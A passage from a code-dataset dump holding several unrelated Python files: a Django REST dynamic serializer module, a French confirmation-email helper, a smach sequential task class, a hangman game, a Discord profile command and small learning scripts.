super(WithDynamicSerializerMixin, self).__init__(**kwargs)\n\n self.envelope = envelope\n self.sideloading = sideloading\n self.debug = debug\n self.dynamic = dynamic\n self.request_fields = request_fields or {}\n\n # `embed` is overriden by `sideloading`\n embed = embed if sideloading is None else not sideloading\n self.embed = embed\n\n self._dynamic_init(only_fields, include_fields, exclude_fields)\n self.enable_optimization = settings.ENABLE_SERIALIZER_OPTIMIZATIONS\n\n def _dynamic_init(self, only_fields, include_fields, exclude_fields):\n \"\"\"\n Modifies `request_fields` via higher-level dynamic field interfaces.\n\n Arguments:\n only_fields: List of field names to render.\n All other fields will be deferred (respects sideloads).\n include_fields: List of field names to include.\n Adds to default field set, (respects sideloads).\n `*` means include all fields.\n exclude_fields: List of field names to exclude.\n Removes from default field set. If set to '*', all fields are\n removed, except for ones that are explicitly included.\n \"\"\"\n\n if not self.dynamic:\n return\n\n if (isinstance(self.request_fields, dict) and\n self.request_fields.pop('*', None) is False):\n exclude_fields = '*'\n\n only_fields = set(only_fields or [])\n include_fields = include_fields or []\n exclude_fields = exclude_fields or []\n all_fields = set(self.get_all_fields().keys())\n\n if only_fields:\n exclude_fields = '*'\n include_fields = only_fields\n\n if exclude_fields == '*':\n # First exclude all, then add back in explicitly included fields.\n include_fields = set(\n list(include_fields) + [\n field for field, val in six.iteritems(self.request_fields)\n if val or val == {}\n ]\n )\n exclude_fields = all_fields - include_fields\n elif include_fields == '*':\n include_fields = all_fields\n\n for name in exclude_fields:\n self.request_fields[name] = False\n\n for name in include_fields:\n if not isinstance(self.request_fields.get(name), dict):\n # not sideloading this field\n self.request_fields[name] = True\n\n def get_filters(self):\n filters = getattr(self.get_meta(), 'filters', {})\n return OrderedDict((\n (name, Filter(name, value, serializer=self)) for name, value in\n filters.items()\n ))\n\n def get_field_value(self, key, instance=None):\n if instance == '':\n instance = None\n\n field = self.fields[key]\n if hasattr(field, 'prepare_value'):\n value = field.prepare_value(instance)\n else:\n value = field.to_representation(\n field.get_attribute(instance)\n )\n if not isinstance(value, FieldFile):\n if isinstance(value, list):\n value = [\n getattr(v, 'instance', v) for v in value\n ]\n else:\n value = getattr(value, 'instance', value)\n error = self.errors.get(key) if hasattr(self, '_errors') else None\n\n if isinstance(field, JSONField):\n return DynamicJSONBoundField(\n field, value, error, prefix='', instance=instance\n )\n return DynamicBoundField(\n field, value, error, prefix='', instance=instance\n )\n\n def get_pk_field(self):\n try:\n field = self.get_field('pk')\n return field.field_name\n except:\n pass\n return 'pk'\n\n @classmethod\n def get_icon(cls):\n meta = cls.get_meta()\n return getattr(meta, 'icon', None)\n\n @classmethod\n def get_meta(cls):\n return cls.Meta\n\n def resolve(self, query):\n \"\"\"Resolves a query into model and serializer fields.\n\n Arguments:\n query: an API field path, in dot-nation\n e.g: \"creator.location_name\"\n\n Returns:\n (model_fields, api_fields)\n e.g:\n [\n Blog._meta.fields.user,\n User._meta.fields.location,\n Location._meta.fields.name\n ],\n [\n DynamicRelationField(source=\"user\"),\n DynamicCharField(source=\"location.name\")\n ]\n\n Raises:\n ValidationError if the query is invalid,\n e.g. references a method field or an undefined field\n ```\n\n Note that the lists do not necessarily contain the\n same number of elements because API fields can reference nested model fields.\n \"\"\" # noqa\n if not isinstance(query, six.string_types):\n parts = query\n query = '.'.join(query)\n else:\n parts = query.split('.')\n\n model_fields = []\n api_fields = []\n\n serializer = self\n\n model = serializer.get_model()\n resource_name = serializer.get_name()\n meta = Meta(model)\n api_name = parts[0]\n other = parts[1:]\n\n try:\n api_field = serializer.get_field(api_name)\n except:\n api_field = None\n\n if other:\n if not (\n api_field and\n isinstance(api_field, DynamicRelationField)\n ):\n raise ValidationError({\n api_name:\n 'Could not resolve \"%s\": '\n '\"%s.%s\" is not an API relation' % (\n query,\n resource_name,\n api_name\n )\n })\n\n source = api_field.source or api_name\n related = api_field.serializer_class()\n other = '.'.join(other)\n model_fields, api_fields = related.resolve(other)\n\n try:\n model_field = meta.get_field(source)\n except AttributeError:\n raise ValidationError({\n api_name:\n 'Could not resolve \"%s\": '\n '\"%s.%s\" is not a model relation' % (\n query,\n meta.get_name(),\n source\n )\n })\n\n model_fields.insert(0, model_field)\n api_fields.insert(0, api_field)\n else:\n if api_name == 'pk':\n # pk is an alias for the id field\n model_field = meta.get_pk_field()\n model_fields.append(model_field)\n if api_field:\n # the pk field may not exist\n # on the serializer\n api_fields.append(api_field)\n else:\n if not api_field:\n raise ValidationError({\n api_name:\n 'Could not resolve \"%s\": '\n '\"%s.%s\" is not an API field' % (\n query,\n resource_name,\n api_name\n )\n })\n\n api_fields.append(api_field)\n\n if api_field.source == '*':\n # a method field was requested, model field is unknown\n return (model_fields, api_fields)\n\n source = api_field.source or api_name\n if '.' in source:\n fields = source.split('.')\n for field in fields[:-1]:\n related_model = None\n try:\n model_field = meta.get_field(field)\n related_model = model_field.related_model\n except:\n pass\n\n if not related_model:\n raise ValidationError({\n api_name:\n 'Could not resolve \"%s\": '\n '\"%s.%s\" is not a model relation' % (\n query,\n meta.get_name(),\n field\n )\n })\n model = related_model\n meta = Meta(model)\n model_fields.append(model_field)\n field = fields[-1]\n try:\n model_field = meta.get_field(field)\n except:\n raise ValidationError({\n api_name:\n 'Could not resolve: \"%s\", '\n '\"%s.%s\" is not a model field' % (\n query,\n meta.get_name(),\n field\n )\n })\n model_fields.append(model_field)\n else:\n try:\n model_field = meta.get_field(source)\n except:\n raise ValidationError({\n api_name:\n 'Could not resolve \"%s\": '\n '\"%s.%s\" is not a model field' % (\n query,\n meta.get_name(),\n source\n )\n })\n model_fields.append(model_field)\n\n return (model_fields, api_fields)\n\n def disable_envelope(self):\n envelope = self.envelope\n self.envelope = False\n if envelope:\n self._processed_data = None\n\n @classmethod\n def get_model(cls):\n \"\"\"Get the model, if the serializer has one.\n\n Model serializers should implement this method.\n \"\"\"\n return None\n\n def get_field(self, field_name):\n # it might be deferred\n fields = self.get_all_fields()\n if field_name == 'pk':\n meta = self.get_meta()\n if hasattr(meta, '_pk'):\n return meta._pk\n\n field = None\n model = self.get_model()\n primary_key = getattr(meta, 'primary_key', None)\n\n if primary_key:\n field = fields.get(primary_key)\n else:\n for n, f in fields.items():\n # try to use model fields\n try:\n if getattr(field, 'primary_key', False):\n field = f\n break\n\n model_field = get_model_field(\n model,\n f.source or n\n )\n\n if model_field.primary_key:\n field = f\n break\n except:\n pass\n\n if not field:\n # fall back to a field called ID\n if 'id' in fields:\n field = fields['id']\n\n if field:\n meta._pk = field\n return field\n else:\n if field_name in fields:\n field = fields[field_name]\n return field\n\n raise ValidationError({\n field_name: '\"%s\" is not an API field' % field_name\n })\n\n def get_format(self):\n view = self.context.get('view')\n get_format = getattr(view, 'get_format', None)\n if callable(get_format):\n return get_format()\n return None\n\n @classmethod\n def get_name(cls):\n \"\"\"Get the serializer name.\n\n The name can be defined on the Meta class or will be generated\n automatically from the model name.\n \"\"\"\n if not hasattr(cls.Meta, 'name'):\n class_name = getattr(cls.get_model(), '__name__', None)\n setattr(\n cls.Meta,\n 'name',\n inflection.underscore(class_name) if class_name else None\n )\n\n return cls.Meta.name\n\n @classmethod\n def get_url(self, pk=None):\n # if associated with a registered viewset, use its URL\n url = getattr(self, '_url', None)\n if url:\n # use URL key to get endpoint\n url = reverse(url)\n if not url:\n # otherwise, return canonical URL for this model\n from dynamic_rest.routers import DynamicRouter\n url = DynamicRouter.get_canonical_path(\n self.get_resource_key()\n )\n if pk:\n return '%s/%s/' % (url, pk)\n return url\n\n @classmethod\n def get_description(cls):\n return getattr(cls.Meta, 'description', None)\n\n @classmethod\n def get_class_getter(self):\n meta = self.get_meta()\n return getattr(meta, 'get_classes', None)\n\n @classmethod\n def get_name_field(cls):\n if not hasattr(cls.Meta, 'name_field'):\n # fallback to primary key\n return 'pk'\n return cls.Meta.name_field\n\n @classmethod\n def get_search_key(cls):\n meta = cls.get_meta()\n if hasattr(meta, 'search_key'):\n return meta.search_key\n\n # fallback to name field\n name_field = cls.get_name_field()\n if name_field:\n return 'filter{%s.icontains}' % name_field\n\n # fallback to PK\n return 'pk'\n\n @classmethod\n def get_plural_name(cls):\n \"\"\"Get the serializer's plural name.\n\n The plural name may be defined on the Meta class.\n If the plural name is not defined,\n the pluralized form of the name will be returned.\n \"\"\"\n if not hasattr(cls.Meta, 'plural_name'):\n setattr(\n cls.Meta,\n 'plural_name',\n inflection.pluralize(cls.get_name())\n )\n return cls.Meta.plural_name\n\n def get_request_attribute(self, attribute, default=None):\n return getattr(\n self.context.get('request'),\n attribute,\n default\n )\n\n def set_request_method(self, method=None):\n self._request_method = method\n\n def get_request_method(self):\n if getattr(self, '_request_method', None):\n return self._request_method\n else:\n return self.get_request_attribute(\n 'method',\n ''\n ).upper()\n\n def get_all_fields(self):\n \"\"\"Returns the entire serializer field set.\n\n Does not respect dynamic field inclusions/exclusions.\n \"\"\"\n if not hasattr(self, '_all_fields'):\n self._all_fields = super(\n WithDynamicSerializerMixin,\n self\n ).get_fields()\n for k, field in six.iteritems(self._all_fields):\n field.field_name = k\n label = inflection.humanize(k)\n field.label = getattr(field, 'label', label) or label\n field.parent = self\n return self._all_fields\n\n def _get_flagged_field_names(self, fields, attr, meta_attr=None):\n meta = self.get_meta()\n if meta_attr is None:\n meta_attr = '%s_fields' % attr\n meta_list = set(getattr(meta, meta_attr, []))\n return {\n name for name, field in six.iteritems(fields)\n if getattr(field, attr, None) is True or name in\n meta_list\n }\n\n def _get_deferred_field_names(self, fields):\n meta = self.get_meta()\n deferred_fields = self._get_flagged_field_names(\n fields,\n 'deferred'\n )\n\n defer_many_relations = (\n settings.DEFER_MANY_RELATIONS\n if not hasattr(meta, 'defer_many_relations')\n else meta.defer_many_relations\n )\n if defer_many_relations:\n # Auto-defer all fields, unless the 'deferred' attribute\n # on the field is specifically set to False.\n many_fields = self._get_flagged_field_names(fields, 'many')\n deferred_fields.update({\n name for name in many_fields\n if getattr(fields[name], 'deferred', None) is not False\n })\n\n return deferred_fields\n\n def flag_fields(self, all_fields, fields_to_flag, attr, value):\n for name in fields_to_flag:\n field = all_fields.get(name)\n if not field:\n continue\n setattr(field, attr, value)\n\n def get_fields(self):\n \"\"\"Returns the serializer's field set.\n\n If `dynamic` is True, respects field inclusions/exlcusions.\n Otherwise, reverts back to standard DRF behavior.\n \"\"\"\n all_fields = self.get_all_fields()\n if self.dynamic is False:\n return all_fields\n\n if self.id_only():\n return {}\n\n serializer_fields = copy.deepcopy(all_fields)\n request_fields = self.request_fields\n deferred = self._get_deferred_field_names(serializer_fields)\n\n # apply request overrides\n if request_fields:\n if request_fields is True:\n request_fields = {}\n for name, include in six.iteritems(request_fields):\n if name not in serializer_fields and name != 'pk':\n raise exceptions.ParseError(\n '\"%s\" is not a valid field name for \"%s\".' %\n (name, self.get_name())\n )\n if include is not False and name in deferred:\n deferred.remove(name)\n elif include is False:\n deferred.add(name)\n\n for name in deferred:\n serializer_fields.pop(name)\n\n # Set read_only flags based on read_only_fields meta list.\n # Here to cover DynamicFields not covered by DRF.\n meta = self.get_meta()\n ro_fields = getattr(meta, 'read_only_fields', [])\n self.flag_fields(serializer_fields, ro_fields, 'read_only', True)\n\n pw_fields = getattr(meta, 'untrimmed_fields', [])\n self.flag_fields(\n serializer_fields,\n pw_fields,\n 'trim_whitespace',\n False,\n )\n\n method = self.get_request_method()\n # Toggle read_only flags for immutable fields.\n # Note: This overrides `read_only` if both are set, to allow\n # inferred DRF fields to be made immutable.\n immutable_field_names = self._get_flagged_field_names(\n serializer_fields,\n 'immutable'\n )\n self.flag_fields(\n serializer_fields,\n immutable_field_names,\n 'read_only',\n value=method in ('PUT', 'PATCH')\n )\n # Toggle read_only for only-update fields\n only_update_field_names = self._get_flagged_field_names(\n serializer_fields,\n 'only_update'\n )\n self.flag_fields(\n serializer_fields,\n only_update_field_names,\n 'read_only',\n value=method in ('POST')\n )\n return serializer_fields\n\n def is_field_sideloaded(self, field_name):\n if not isinstance(self.request_fields, dict):\n return False\n return isinstance(self.request_fields.get(field_name), dict)\n\n def get_link_fields(self):\n \"\"\"Construct dict of name:field for linkable fields.\"\"\"\n if not hasattr(self, '_link_fields'):\n query_params = self.get_request_attribute('query_params', {})\n if 'exclude_links' in query_params:\n self._link_fields = {}\n else:\n all_fields = self.get_all_fields()\n self._link_fields = {\n name: field for name, field in six.iteritems(all_fields)\n if isinstance(field, DynamicRelationField) and\n getattr(field, 'link', True) and\n not (\n # Skip sideloaded fields\n name in self.fields and\n self.is_field_sideloaded(name)\n )\n }\n\n return self._link_fields\n\n @cached_property\n def _readable_fields(self):\n # NOTE: Copied from DRF, exists in 3.2.x but not 3.1\n return [\n field for field in self.fields.values()\n if not field.write_only\n ]\n\n def _faster_to_representation(self, instance):\n \"\"\"Modified to_representation with optimizations.\n\n 1) Returns a plain old dict as opposed to OrderedDict.\n (Constructing ordered dict is ~100x slower than `{}`.)\n 2) Ensure we use a cached list of fields\n (this optimization exists in DRF 3.2 but not 3.1)\n\n Arguments:\n instance: a model instance or data object\n Returns:\n Dict of primitive datatypes.\n \"\"\"\n\n ret = {}\n fields = self._readable_fields\n\n for field in fields:\n try:\n attribute = field.get_attribute(instance)\n except SkipField:\n continue\n\n if attribute is None:\n # We skip `to_representation` for `None` values so that\n # fields do not have to explicitly deal with that case.\n ret[field.field_name] = None\n else:\n ret[field.field_name] = field.to_representation(attribute)\n\n return ret\n\n def is_root(self):\n return self.parent is None\n\n def to_representation(self, instance):\n \"\"\"Modified to_representation method.\n\n Arguments:\n instance: A model instance or data object.\n Returns:\n Instance ID if the serializer is meant to represent its ID.\n Otherwise, a tagged data dict representation.\n \"\"\"\n id_only = self.id_only()\n if (\n self.get_format() == 'admin' and\n self.is_root()\n ):\n id_only = False\n if id_only:\n return instance.pk\n else:\n if self.enable_optimization:\n representation = self._faster_to_representation(instance)\n else:\n representation = super(\n WithDynamicSerializerMixin,\n self\n ).to_representation(instance)\n\n query_params = self.get_request_attribute('query_params', {})\n if (\n settings.ENABLE_LINKS and\n 'exclude_links' not in query_params\n ):\n representation = merge_link_object(\n self, representation, instance\n )\n\n if self.debug:\n representation['_meta'] = {\n 'id': instance.pk,\n 'type': self.get_plural_name()\n }\n\n # tag the representation with the serializer and instance\n return tag_dict(\n representation,\n serializer=self,\n instance=instance,\n embed=self.embed\n )\n\n def to_internal_value(self, data):\n meta = self.get_meta()\n value = super(WithDynamicSerializerMixin, self).to_internal_value(data)\n\n id_attr = getattr(meta, 'update_lookup_field', 'id')\n request_method = self.get_request_method()\n\n # Add update_lookup_field field back to validated data\n # since super by default strips out read-only fields\n # hence id will no longer be present in validated_data.\n if all((\n isinstance(self.root, DynamicListSerializer),\n id_attr,\n request_method in ('PUT', 'PATCH')\n )):\n id_field = self.fields[id_attr]\n id_value = id_field.get_value(data)\n value[id_attr] = id_value\n\n return value\n\n def add_post_save(self, fn):\n if not hasattr(self, '_post_save'):\n self._post_save = []\n self._post_save.append(fn)\n\n def do_post_save(self, instance):\n if hasattr(self, '_post_save'):\n for fn in self._post_save:\n fn(instance)\n self._post_save = []\n\n def update(self, instance, validated_data):\n # support nested writes if possible\n meta = Meta(instance)\n to_save = [instance]\n # Simply set each attribute on the instance, and then save it.\n # Note that unlike `.create()` we don't need to treat many-to-many\n # relationships as being a special case. During updates we already\n # have an instance pk for the relationships to be associated with.\n try:\n\n with transaction.atomic():\n for attr, value in validated_data.items():\n try:\n field = meta.get_field(attr)\n if field.related_model:\n if isinstance(value, dict):\n # nested dictionary on a has-one\n # relationship, we should take the current\n # related value and apply updates to it\n to_save.extend(\n nested_update(instance, attr, value)\n )\n else:\n # normal relationship update\n setattr(instance, attr, value)\n else:\n setattr(instance, attr, value)\n except AttributeError:\n setattr(instance, attr, value)\n\n for s in to_save:\n s.save()\n except Exception as e:\n raise exceptions.ValidationError(e)\n\n return instance\n\n def save(self, *args, **kwargs):\n \"\"\"Serializer save that addresses prefetch issues.\"\"\"\n update = getattr(self, 'instance', None) is not None\n try:\n instance = super(\n WithDynamicSerializerMixin,\n self\n ).save(\n *args,\n **kwargs\n )\n except exceptions.APIException as e:\n if self.debug:\n import traceback\n traceback.print_exc()\n\n raise\n except Exception as e:\n if self.debug:\n import traceback\n traceback.print_exc()\n\n error = e.args[0] if e.args else str(e)\n if not isinstance(error, dict):\n error = {'error': error}\n self._errors = error\n raise exceptions.ValidationError(\n self.errors\n )\n self.do_post_save(instance)\n\n view = self._context.get('view')\n if update and view:\n # Reload the object on update\n # to get around prefetch cache issues\n instance = self.instance = view.get_object()\n return instance\n\n def id_only(self):\n \"\"\"Whether the serializer should return an ID instead of an object.\n\n Returns:\n True if and only if `request_fields` is True.\n \"\"\"\n return (\n self.dynamic and\n self.request_fields is True\n )\n\n @property\n def data(self):\n if getattr(self, '_processed_data', None) is None:\n data = super(WithDynamicSerializerMixin, self).data\n data = SideloadingProcessor(\n self, data\n ).data if self.envelope else data\n self._processed_data = ReturnDict(\n data,\n serializer=self\n )\n return self._processed_data\n\n\nclass WithDynamicModelSerializerMixin(WithDynamicSerializerMixin):\n\n \"\"\"Adds DREST serializer methods specific to model-based serializers.\"\"\"\n\n @classmethod\n def get_model(cls):\n return getattr(cls.Meta, 'model', None)\n\n def get_id_fields(self):\n \"\"\"\n Called to return a list of fields consisting of, at minimum,\n the PK field name. The output of this method is used to\n construct a Prefetch object with a .only() queryset\n when this field is not being sideloaded but we need to\n return a list of IDs.\n \"\"\"\n model = self.get_model()\n meta = Meta(model)\n\n out = [meta.get_pk_field().attname]\n\n # If this is being called, it means it\n # is a many-relation to its parent.\n # Django wants the FK to the parent,\n # but since accurately inferring the FK\n # pointing back to the parent is less than trivial,\n # we will just pull all ID fields.\n # TODO: We also might need to return all non-nullable fields,\n # or else it is possible Django will issue another request.\n for field in meta.get_fields():\n if isinstance(field, models.ForeignKey):\n out.append(field.attname)\n\n return out\n\n\nclass DynamicModelSerializer(\n WithDynamicModelSerializerMixin,\n serializers.ModelSerializer\n):\n\n \"\"\"DREST-compatible model-based serializer.\"\"\"\n pass\n\n\nclass EphemeralObject(object):\n\n \"\"\"Object that initializes attributes from a dict.\"\"\"\n\n def __init__(self, values_dict):\n if 'pk' not in values_dict:\n raise Exception('\"pk\" key is required')\n self.__dict__.update(values_dict)\n\n\nclass DynamicEphemeralSerializer(\n WithDynamicSerializerMixin,\n serializers.Serializer\n):\n\n \"\"\"DREST-compatible baseclass for non-model serializers.\"\"\"\n\n def to_representation(self, instance):\n \"\"\"\n Provides post processing. Sub-classes should implement their own\n to_representation method, but pass the resulting dict through\n this function to get tagging and field selection.\n\n Arguments:\n instance: Serialized dict, or object. If object,\n it will be serialized by the super class's\n to_representation() method.\n \"\"\"\n\n if not isinstance(instance, dict):\n data = super(\n DynamicEphemeralSerializer,\n self\n ).to_representation(instance)\n else:\n data = instance\n instance = EphemeralObject(data)\n\n if self.id_only():\n return data\n else:\n return tag_dict(data, serializer=self, instance=instance)\n","sub_path":"dynamic_rest/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":41555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"351580661","text":"# coding: utf-8\nfrom django.core.mail import send_mass_mail\nfrom django.conf import settings\n\nmessage = {\n \"contact\": '''\\\nBonjour,\n\nVotre commentaire sur le site www.uxperiment.fr a bien été pris en compte.\n\nNous vous remercions de votre participation.\n\nA bientôt,\n\nL'équipe UXperiment\n''',\n \"suggest\": '''\\\nBonjour,\n\nVotre proposition de site internet sur le site www.uxperiment.fr a bien été pris en compte.\n\nNous vous remercions de votre participation.\n\nA bientôt,\n\nL'équipe UXperiment\n''',\n}\n\ndef send_message(confirm, data):\n send_mass_mail((build_user_email(confirm, data['sender']), \n build_admin_email(confirm, data)))\n\ndef build_user_email(confirm, recipient):\n \"\"\" Build user message in form of send_mail \"\"\"\n text = message[confirm]\n if confirm == 'suggest':\n subject = 'Confirmation de votre proposition sur UXperiment'\n if confirm == 'contact':\n subject = 'Commentaire sur UXperiment'\n if confirm == 'signin':\n subject = 'Confirmation d\\'inscription sur UXperiment'\n\n return subject, text, settings.EMAIL_HOST_USER, [recipient]\n\ndef build_admin_email(confirm, data):\n \"\"\" Build admin message in form of send_mail \"\"\"\n if confirm == 'suggest':\n subject = 'Nouvelle proposition de site sur UXperiment'\n text = 'L\\'utilisateur : %s, vient de proposer le site %s'\\\n % (data['username'], data['website'])\n\n if confirm == 'contact':\n subject = 'Nouveau contact sur UXperiment'\n text = '''\\\nEmail : %s\nSujet : %s\nMessage :\n%s''' % (data['sender'], data['subject'], data['message'])\n\n return subject, text, settings.EMAIL_HOST_USER, [settings.EMAIL_RECIPIENT]\n","sub_path":"uxperiment/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"642200765","text":"def dodawanie(a: int, b: int):\n print(\"Wynik dodawania tych dwóch liczb to:\",a+b)\n print(\"Świetna aplikacja dodająca\")\n print(\"To jest funkcja\")\n\nx = input(\"Podaj pierwszą liczbę do dodania: \")\ny = input(\"Podaj drugi składki sumy: \")\n\ndodawanie(x,y)\ndodawanie(y,x)","sub_path":"25Funkcje.py","file_name":"25Funkcje.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"285249829","text":"import smach\nfrom smach_bt.task import Task\nfrom smach_bt.container import ContainerTask\n\nclass SequentialTask(ContainerTask):\n def __init__(self, stop_result, continue_result, label=None, input_keys=[], output_keys=[], io_keys=[]):\n ContainerTask.__init__(self, label=label, input_keys=input_keys, output_keys=output_keys, io_keys=io_keys)\n self._initial_task_idx = 0\n self._active_task_idx = None\n self._stop_result = stop_result\n self._continue_result = continue_result\n self._preempt_requested = False\n \n def try_immediate(self, userdata=None):\n if userdata is None:\n userdata = smach.UserData()\n \n # With lock\n with self._lock:\n assert(self._runstate == Task.IDLE)\n assert(self._active_task_idx is None)\n \n (result, self._active_task_idx) = self._loop(self._initial_task_idx, userdata)\n \n if result == Task.DEFERRED:\n self._runstate = Task.READY\n else:\n assert(self._active_task_idx == None)\n self._runstate = Task.IDLE\n \n return result\n\n def execute_deferred(self, parent_cb, userdata=None):\n if userdata is None:\n userdata = smach.UserData()\n \n with self._lock:\n assert(self._runstate == Task.READY)\n self._runstate = Task.EXECUTING\n self._parent_cb = parent_cb\n self._execute_deferred_child(self._active_task_idx, self._make_cb(self._active_task_idx), userdata)\n \n def cancel(self):\n with self._lock:\n assert(self._runstate == Task.READY)\n assert(self._active_task_idx is not None)\n self._tasks[self._active_task_idx].cancel()\n self._runstate = Task.IDLE\n self._active_task_idx = None\n \n def preempt(self):\n # With lock\n with self._lock:\n # States we can be in when lock is taken/released:\n # Task.IDLE && _active_task_idx is None\n # Task.READY && _active_task_idx is not None\n # Task.EXECUTING && _active_task_idx is not None\n \n if self._runstate == Task.READY:\n assert(self._active_task_idx is not None)\n self.cancel()\n # preemption complete\n elif self._runstate == Task.EXECUTING:\n assert(self._active_task_idx is not None)\n self._tasks[self._active_task_idx].preempt()\n self._preempt_requested = True\n # preemption deferred until callback\n else:\n assert(self._runstate == Task.IDLE)\n assert(self._active_task_idx is None)\n # preemption complete\n \n # Returns (result, final_idx)\n def _loop(self, initial_idx, userdata):\n # self._lock should be locked by calling function.\n # We will stop as soon as any task returns DEFERRED\n # Caller should then call execute_deferred() on that task\n idx = initial_idx\n while idx < len(self._tasks):\n # If self._active_task_idx is not None and initial_idx <= self._active_task_idx,\n # then this _loop call is coming from the timer thread and has reached the active task.\n if idx == self._active_task_idx:\n return (None, idx)\n \n result = self._try_immediate_child(idx, userdata)\n \n if result == Task.DEFERRED:\n return (Task.DEFERRED, idx)\n \n if result == self._continue_result:\n idx += 1\n continue\n \n if result == self._stop_result:\n return (self._stop_result, None)\n \n return (self._continue_result, None)\n\n def _make_cb(self, idx):\n def cb(result, userdata):\n self._task_termination_cb(result, idx, userdata)\n return cb\n\n def _task_termination_cb(self, result, task_idx, userdata):\n cb = None\n # With lock\n with self._lock:\n assert(result != Task.DEFERRED)\n assert(0 <= task_idx and task_idx < len(self._tasks))\n # _active_task_idx might not be the same as the task_idx of the task\n # that just completed, if we were preempted by a timer callback in\n # PreemptingSequenceTask.\n \n cb = self._parent_cb\n \n if self._preempt_requested:\n self._runstate = Task.IDLE\n self._active_task_idx = None\n self._preempt_requested = False\n result = Task.ABORTED\n else:\n if result == self._continue_result:\n (result, self._active_task_idx) = self._loop(self._active_task_idx + 1, userdata)\n\n if result == Task.DEFERRED:\n self._execute_deferred_child(self._active_task_idx, self._make_cb(self._active_task_idx), userdata)\n else:\n self._runstate = Task.IDLE\n self._active_task_idx = None\n \n # Without lock\n if result != Task.DEFERRED:\n cb(result, userdata)\n \n def _add_active_tasks_recursive(self, label_for_task, active_tasks):\n with self._lock:\n if self._active_task_idx is not None:\n active_task = self._tasks[self._active_task_idx]\n active_tasks.append(label_for_task[active_task])\n active_task._add_active_tasks_recursive(label_for_task, active_tasks)\n ","sub_path":"src/smach_bt/sequential.py","file_name":"sequential.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"470352258","text":"def hangman():\r\n import random\r\n \r\n word_list = ['word', 'letter', 'number', 'person', 'pen', 'class',\r\n 'people', 'sound', 'water', 'side', 'place', 'man', 'men',\r\n 'woman', 'women', 'boy', 'girl', 'year', 'day', 'week', 'month',\r\n 'name', 'sentence', 'line', 'air', 'land', 'home', 'hand', 'house',\r\n 'picture', 'animal', 'mother', 'father', 'brother', 'sister', 'world',\r\n 'head', 'page', 'country', 'question', 'answer', 'school', 'plant', 'food',\r\n 'sun', 'state', 'eye', 'city', 'tree', 'farm', 'story', 'sea', 'night', 'day',\r\n 'life', 'north', 'south', 'east', 'west', 'child', 'children', 'example', 'paper',\r\n 'music', 'river', 'car', 'foot', 'feet', 'book', 'science', 'room', 'friend', 'idea',\r\n 'fish', 'mountain', 'horse', 'watch', 'color', 'face', 'wood', 'list', 'bird', 'body',\r\n 'dog', 'family', 'song', 'door', 'product', 'wind', 'ship', 'area', 'rock', 'order', 'fire',\r\n 'problem', 'piece', 'top', 'bottom', 'king', 'space']\r\n\r\n stages = ['',\r\n '-------- ',\r\n '| | ',\r\n '| | ',\r\n '| 0 ',\r\n '| /|) ',\r\n '| // ',\r\n '| '\r\n ]\r\n\r\n print ('Welcom to Hangman')\r\n\r\n while True:\r\n word = random.choice(word_list)\r\n wrong = 0\r\n rletters = list(word)\r\n board = ['__']*len(word)\r\n \r\n while True:\r\n if '__' not in board:\r\n print(f'\\nYou win! It was: {word}')\r\n break\r\n print('\\n')\r\n char = input('Guess a letter: ')\r\n if char in rletters:\r\n cind = rletters.index(char)\r\n board[cind] = char\r\n rletters[cind] = '$'\r\n print(' '.join(board))\r\n elif char == 'hint':\r\n i = board.index('__')\r\n char = rletters[i]\r\n board[i] = char\r\n rletters[i] = '$'\r\n print(' '.join(board))\r\n else:\r\n wrong += 1\r\n print(' '.join(board))\r\n print('\\n'.join(stages[:wrong+1]))\r\n if wrong == len(stages) -1:\r\n print(f'You lose! It was: {word}')\r\n break\r\n\r\n if input('again? (y/n):') == 'n':\r\n break\r\n \r\nhangman()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"107457234","text":"import discord\nimport utils\nfrom libs import imgp\n\n\nasync def run(client, message, args, prefix, db):\n if len(args) == 0:\n user_dc = message.author\n\n else:\n user_dc = utils.get_user(message.guild, args[0])\n if not user_dc: raise Exception(f\"Üye '{args[0]}' bulunamadı\")\n\n await imgp.profil_yap(user_dc, db[user_dc], db)\n\n await message.channel.send(file=discord.File(f\"data/profile.png\"))\n","sub_path":"commands/profil.py","file_name":"profil.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"118432060","text":"# -*- coding:utf-8 -*-\n## -*- coding:gbk-*-只是申明文件编码,程序还是unicode,在python3中可以直接str.encode(\"指定编码\")\n#转码步骤:先将字符串转成unicode,再转成其他的类型,python3中encode的同时,将str转成bytes了,最后要显示字符串,还需要用str 对应的编码decode\n\n\n\ns = \"你好\" #依旧是unicode\n#s_to_unicode = s.decode('utf-8') #unicode类型不能decode()\ns_to_gbk = s.encode(\"gbk\")\n\nprint(s_to_gbk)\ngbk_to_unicode = s_to_gbk.decode(\"gbk\").encode(\"utf-8\").decode(\"utf-8\")\n#为什么要encode(\"utf-8\").decode(\"utf-8\")才能显示中文?这个版本都是先转成二进制,再转成字符串?\nprint(gbk_to_unicode)","sub_path":"day3/encode_decode_unicode_utf-8.py","file_name":"encode_decode_unicode_utf-8.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"650901933","text":"# -*- coding: utf-8 -*-\n\"\"\"\nFresco creates a \"simulated observation\" of a set of particles.\nParticles can be \"stars\" (point sources emitting light) or \"gas\" 